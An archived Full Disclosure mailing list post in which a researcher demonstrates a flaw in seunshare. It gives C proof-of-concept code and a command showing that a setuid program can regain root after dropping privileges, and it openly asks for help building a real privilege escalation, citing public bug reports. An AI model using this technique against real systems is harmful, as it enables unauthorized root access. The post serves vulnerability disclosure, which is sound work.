Full Disclosure mailing list archives
Request for help exploiting seunshare
From: Andrew Lutomirski <luto () mit edu>
Date: Wed, 23 Apr 2014 15:08:09 -0700
Here's an "obviously secure" setuid root program: #include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <err.h> int main() { if (setuid(getuid()) != 0) err(1, "setuid(getuid())"); printf("Dropped privs; real uid is %lu and effective uid is %lu\n", (unsigned long)getuid(), (unsigned long)geteuid()); seteuid(0); /* Do something that risks executing untrusted code here */ if (geteuid() == 0) { printf("It's baaaack!\n"); } else { printf("Phew, safe.\n"); } return 0; } Install it setuid root and run it. It prints: $ ./sesploit Dropped privs; real uid is 1000 and effective uid is 1000 Phew, safe. Now try this: $ seunshare -t . `realpath ./sesploit` Dropped privs; real uid is 1000 and effective uid is 1000 It's baaaack! IMO this is bad. I'm looking for help finding a real privilege escalation based on it. The underlying issue has been public for well over a year with no real action, and there's even a patch: https://bugzilla.redhat.com/show_bug.cgi?id=885288 https://bugzilla.redhat.com/show_bug.cgi?id=1035427 --Andy _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Request for help exploiting seunshare Andrew Lutomirski (Apr 23)